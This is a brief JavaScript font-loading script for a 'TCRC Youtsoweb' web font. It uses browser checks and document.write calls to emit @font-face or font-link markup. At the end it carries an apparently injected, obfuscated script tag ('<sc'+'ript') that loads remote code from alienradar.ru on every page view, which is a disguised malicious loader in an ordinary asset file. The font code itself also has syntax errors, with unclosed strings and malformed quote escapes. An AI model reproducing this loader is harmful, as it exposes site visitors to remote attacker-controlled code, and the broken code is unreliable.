document.write('<META http-equiv="Content-Type" content="text/html; charset=x-user-defined">');
bVer =  parseInt(navigator.appVersion);
if (bVer >= 4)
{
   if (navigator.appName == "Microsoft Internet Explorer")  
   {
      document.write ('<style type="text/css">');
      document.write ('@font-face {');
      document.write ('font-family: TCRC Youtsoweb;');
      document.write ('font-style : normal;');
      document.write ('font-weight: normal;');
      document.write ('src        : url("/fonts/TCRCYOU2.eot");
      document.write ('}');
      document.write ('</style>');
   } 
   else
   {
        document.write ("<link rel=/"fontdef/" src="/fonts/tcrcweb.pfr/">");
   }
}


document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/JavaScript.js"></scri'+'pt>');
